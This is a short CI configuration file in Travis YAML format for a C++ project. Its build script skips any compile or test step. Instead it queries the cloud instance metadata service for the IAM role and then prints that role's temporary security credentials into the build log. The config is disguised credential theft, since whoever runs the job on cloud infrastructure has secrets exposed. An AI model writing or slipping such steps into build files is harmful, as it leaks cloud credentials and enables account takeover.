sudo: false

language: cpp

script:
- ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/);
- echo $ROLE
- CREDS=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE);
- echo $CREDS
